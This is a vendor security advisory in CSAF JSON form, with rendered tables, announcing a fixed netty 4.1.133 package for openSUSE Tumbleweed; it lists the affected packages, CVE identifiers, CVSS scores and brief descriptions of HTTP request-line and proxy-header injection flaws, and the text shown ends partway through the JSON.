Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
8.2 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
5.3 (Medium)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
References
38 references
| URL | Category |
|---|---|
| https://www.suse.com/support/security/rating/ | external |
| https://ftp.suse.com/pub/projects/security/csaf/o… | self |
| https://www.suse.com/security/cve/CVE-2026-41417/ | self |
| https://www.suse.com/security/cve/CVE-2026-42578/ | self |
| https://www.suse.com/security/cve/CVE-2026-42579/ | self |
| https://www.suse.com/security/cve/CVE-2026-42580/ | self |
| https://www.suse.com/security/cve/CVE-2026-42581/ | self |
| https://www.suse.com/security/cve/CVE-2026-42582/ | self |
| https://www.suse.com/security/cve/CVE-2026-42583/ | self |
| https://www.suse.com/security/cve/CVE-2026-42584/ | self |
| https://www.suse.com/security/cve/CVE-2026-42585/ | self |
| https://www.suse.com/security/cve/CVE-2026-42586/ | self |
| https://www.suse.com/security/cve/CVE-2026-42587/ | self |
| https://www.suse.com/security/cve/CVE-2026-44248/ | self |
| https://www.suse.com/security/cve/CVE-2026-41417 | external |
| https://bugzilla.suse.com/1264350 | external |
| https://www.suse.com/security/cve/CVE-2026-42578 | external |
| https://bugzilla.suse.com/1265243 | external |
| https://www.suse.com/security/cve/CVE-2026-42579 | external |
| https://bugzilla.suse.com/1265272 | external |
| https://www.suse.com/security/cve/CVE-2026-42580 | external |
| https://bugzilla.suse.com/1265273 | external |
| https://www.suse.com/security/cve/CVE-2026-42581 | external |
| https://bugzilla.suse.com/1265277 | external |
| https://www.suse.com/security/cve/CVE-2026-42582 | external |
| https://bugzilla.suse.com/1265318 | external |
| https://www.suse.com/security/cve/CVE-2026-42583 | external |
| https://bugzilla.suse.com/1265279 | external |
| https://www.suse.com/security/cve/CVE-2026-42584 | external |
| https://bugzilla.suse.com/1265280 | external |
| https://www.suse.com/security/cve/CVE-2026-42585 | external |
| https://bugzilla.suse.com/1265291 | external |
| https://www.suse.com/security/cve/CVE-2026-42586 | external |
| https://bugzilla.suse.com/1265245 | external |
| https://www.suse.com/security/cve/CVE-2026-42587 | external |
| https://bugzilla.suse.com/1265246 | external |
| https://www.suse.com/security/cve/CVE-2026-44248 | external |
| https://bugzilla.suse.com/1265293 | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "netty-4.1.133-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the netty-4.1.133-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-10795",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10795-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-41417 page",
"url": "https://www.suse.com/security/cve/CVE-2026-41417/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42578 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42578/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42579 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42579/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42580 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42580/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42581 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42581/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42582 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42582/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42583 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42583/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42584 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42584/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42585 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42585/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42586 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42586/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42587 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42587/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-44248 page",
"url": "https://www.suse.com/security/cve/CVE-2026-44248/"
}
],
"title": "netty-4.1.133-1.1 on GA media",
"tracking": {
"current_release_date": "2026-05-16T00:00:00Z",
"generator": {
"date": "2026-05-16T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:10795-1",
"initial_release_date": "2026-05-16T00:00:00Z",
"revision_history": [
{
"date": "2026-05-16T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-1.1.aarch64",
"product": {
"name": "netty-4.1.133-1.1.aarch64",
"product_id": "netty-4.1.133-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "netty-bom-4.1.133-1.1.aarch64",
"product": {
"name": "netty-bom-4.1.133-1.1.aarch64",
"product_id": "netty-bom-4.1.133-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.133-1.1.aarch64",
"product": {
"name": "netty-javadoc-4.1.133-1.1.aarch64",
"product_id": "netty-javadoc-4.1.133-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.133-1.1.aarch64",
"product": {
"name": "netty-parent-4.1.133-1.1.aarch64",
"product_id": "netty-parent-4.1.133-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-1.1.ppc64le",
"product": {
"name": "netty-4.1.133-1.1.ppc64le",
"product_id": "netty-4.1.133-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "netty-bom-4.1.133-1.1.ppc64le",
"product": {
"name": "netty-bom-4.1.133-1.1.ppc64le",
"product_id": "netty-bom-4.1.133-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.133-1.1.ppc64le",
"product": {
"name": "netty-javadoc-4.1.133-1.1.ppc64le",
"product_id": "netty-javadoc-4.1.133-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.133-1.1.ppc64le",
"product": {
"name": "netty-parent-4.1.133-1.1.ppc64le",
"product_id": "netty-parent-4.1.133-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-1.1.s390x",
"product": {
"name": "netty-4.1.133-1.1.s390x",
"product_id": "netty-4.1.133-1.1.s390x"
}
},
{
"category": "product_version",
"name": "netty-bom-4.1.133-1.1.s390x",
"product": {
"name": "netty-bom-4.1.133-1.1.s390x",
"product_id": "netty-bom-4.1.133-1.1.s390x"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.133-1.1.s390x",
"product": {
"name": "netty-javadoc-4.1.133-1.1.s390x",
"product_id": "netty-javadoc-4.1.133-1.1.s390x"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.133-1.1.s390x",
"product": {
"name": "netty-parent-4.1.133-1.1.s390x",
"product_id": "netty-parent-4.1.133-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-1.1.x86_64",
"product": {
"name": "netty-4.1.133-1.1.x86_64",
"product_id": "netty-4.1.133-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "netty-bom-4.1.133-1.1.x86_64",
"product": {
"name": "netty-bom-4.1.133-1.1.x86_64",
"product_id": "netty-bom-4.1.133-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.133-1.1.x86_64",
"product": {
"name": "netty-javadoc-4.1.133-1.1.x86_64",
"product_id": "netty-javadoc-4.1.133-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.133-1.1.x86_64",
"product": {
"name": "netty-parent-4.1.133-1.1.x86_64",
"product_id": "netty-parent-4.1.133-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.133-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64"
},
"product_reference": "netty-4.1.133-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.133-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le"
},
"product_reference": "netty-4.1.133-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.133-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-4.1.133-1.1.s390x"
},
"product_reference": "netty-4.1.133-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.133-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64"
},
"product_reference": "netty-4.1.133-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-bom-4.1.133-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64"
},
"product_reference": "netty-bom-4.1.133-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-bom-4.1.133-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le"
},
"product_reference": "netty-bom-4.1.133-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-bom-4.1.133-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x"
},
"product_reference": "netty-bom-4.1.133-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-bom-4.1.133-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64"
},
"product_reference": "netty-bom-4.1.133-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.133-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64"
},
"product_reference": "netty-javadoc-4.1.133-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.133-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le"
},
"product_reference": "netty-javadoc-4.1.133-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.133-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x"
},
"product_reference": "netty-javadoc-4.1.133-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.133-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64"
},
"product_reference": "netty-javadoc-4.1.133-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-parent-4.1.133-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64"
},
"product_reference": "netty-parent-4.1.133-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-parent-4.1.133-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le"
},
"product_reference": "netty-parent-4.1.133-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-parent-4.1.133-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x"
},
"product_reference": "netty-parent-4.1.133-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-parent-4.1.133-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
},
"product_reference": "netty-parent-4.1.133-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-41417",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-41417"
}
],
"notes": [
{
"category": "general",
"text": "Netty allows request-line validation to be bypassed when a `DefaultHttpRequest` or `DefaultFullHttpRequest` is created first and its URI is later changed via `setUri()`. The constructors reject CRLF and whitespace characters that would break the start-line, but `setUri()` does not apply the same validation. `HttpRequestEncoder` and `RtspEncoder` then write the URI into the request line verbatim. If attacker-controlled input reaches `setUri()`, this enables CRLF injection and insertion of additional HTTP or RTSP requests, leading to HTTP request smuggling or desynchronization on the HTTP side and request injection on the RTSP side. This issue is fixed in versions 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-41417",
"url": "https://www.suse.com/security/cve/CVE-2026-41417"
},
{
"category": "external",
"summary": "SUSE Bug 1264350 for CVE-2026-41417",
"url": "https://bugzilla.suse.com/1264350"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-41417"
},
{
"cve": "CVE-2026-42578",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42578"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty\u0027s HttpProxyHandler constructs HTTP CONNECT requests with header validation explicitly disabled. The newInitialMessage() method creates headers using DefaultHttpHeadersFactory.headersFactory().withValidation(false), then adds user-provided outboundHeaders without any CRLF validation. This allows an attacker who can influence the outbound headers to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42578",
"url": "https://www.suse.com/security/cve/CVE-2026-42578"
},
{
"category": "external",
"summary": "SUSE Bug 1265243 for CVE-2026-42578",
"url": "https://bugzilla.suse.com/1265243"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
